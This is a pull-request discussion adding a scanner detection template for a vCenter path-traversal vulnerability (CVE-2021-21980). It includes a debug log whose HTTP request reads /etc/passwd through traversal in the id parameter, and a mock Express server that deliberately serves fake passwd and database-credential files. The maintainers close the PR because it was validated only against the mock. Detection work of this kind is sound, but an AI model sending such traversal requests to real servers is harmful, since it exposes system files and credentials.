Add template for CVE-2021-21980 - VMware vCenter Server FLEX Client Path Traversal

[Omar8345]

/claim #14077

This PR adds a template for CVE‑2021‑21980, a path traversal vulnerability in VMware vCenter Server’s legacy FLEX/Flash-based vSphere Web Client (containerView endpoint).
The issue allows unauthenticated remote attackers to read arbitrary files via traversal in the id parameter.

The template covers both /ui/vic-rest/ and /vsphere-client/vic-rest/ paths and verifies the response using:

• 200 status code
• passwd regex (root:...:0:0:)
• database credential patterns from vcdb.properties

A mock VMware vCenter server was used to validate the template.

---

Debug Log (Verification)

[WRN] Loading 1 unsigned templates for scan. Use with caution.
[CVE-2021-21980:status-1] http high http://localhost:8080/ui/vic-rest/services/containerView?id=../../../../../../etc/passwd
[CVE-2021-21980:regex-2] http high http://localhost:8080/ui/vic-rest/services/containerView?id=../../../../../../etc/passwd

[INF] Dumped HTTP request:
GET /ui/vic-rest/services/containerView?id=../../../../../../etc/passwd HTTP/1.1
Host: localhost:8080
User-Agent: Mozilla/5.0
Accept: */*

[DBG] Dumped HTTP response:
HTTP/1.1 200 OK
Content-Type: text/plain
Server: VMware vCenter Mock

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
vmware:x:1000:1000:vmware user:/home/vmware:/bin/bash

[INF] Scan completed. 2 matches found.

debug.log:

[�[93mWRN�[0m] Loading 1 unsigned templates for scan. Use with caution.
[�[92mCVE-2021-21980�[0m:�[1;92mstatus-1�[0m] [�[94mhttp�[0m] [�[38;5;208mhigh�[0m] http://localhost:8080/ui/vic-rest/services/containerView?id=../../../../../../etc/passwd
[�[92mCVE-2021-21980�[0m:�[1;92mregex-2�[0m] [�[94mhttp�[0m] [�[38;5;208mhigh�[0m] http://localhost:8080/ui/vic-rest/services/containerView?id=../../../../../../etc/passwd

mock server script:

const express = require("express");
const fs = require("fs");
const app = express();

const PORT = 8080;

const mockFiles = {
  "/etc/passwd": `
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
vmware:x:1000:1000:vmware user:/home/vmware:/bin/bash
`.trim(),

  "/windows/win.ini": `
[fonts]
; dummy windows file
`.trim(),

  "/etc/vmware-vpx/vcdb.properties": `
jdbc.username=VCENTER_USER
jdbc.password=SuperSecretPass123
jdbc.url=jdbc:postgresql://localhost:5432/VCDB
`.trim(),
};

function resolveTraversal(id) {
  try {
    const cleaned = id.replace(/(\.\.\/)+/g, "/");
    return cleaned.startsWith("/") ? cleaned : "/" + cleaned;
  } catch {
    return null;
  }
}

app.get("/ui/vic-rest/services/containerView", (req, res) => {
  const id = req.query.id || "";

  res.set("Content-Type", "text/plain; charset=utf-8");
  res.set("Server", "VMware vCenter Mock");

  if (!id.includes("..")) {
    return res.status(400).send("Invalid containerView id");
  }

  const target = resolveTraversal(id);

  if (!target || typeof target !== "string") {
    return res.status(500).send("Internal Server Error");
  }

  if (mockFiles[target]) {
    console.log(`[+] Served mock file: ${target}`);
    return res.status(200).send(mockFiles[target]);
  }

  console.log(`[-] File not found: ${target}`);
  return res.status(404).send("Not Found");
});

app.get("/", (req, res) => {
  res.send("Mock vCenter server running (CVE‑2021‑21980)");
});

app.listen(PORT, () =>
  console.log(
    `[Mock CVE‑2021‑21980] Server running on http://localhost:${PORT}`
  )
);

[Omar8345]

Hi @pussycat0x 👋,

I’d like to work on this bounty, but I don’t have hardware to run ESXi/VCSA for proper testing.

Are there any acceptable alternatives for validation—e.g., emulated/partial VCSA, cloud HOL, or enhanced mock server evidence?

I want to make it fully review‑compliant and would appreciate your guidance. 🙏

[DhiyaneshGeek]

Hi @Omar8345

Thanks for participating the Bounty Claim Program.

After reviewing the PR, it was observed that it was validated against a mock setup , which out of scope and doesn't eligible for the Bounty Claim

Due to the following reason we are closing this PR

Thanks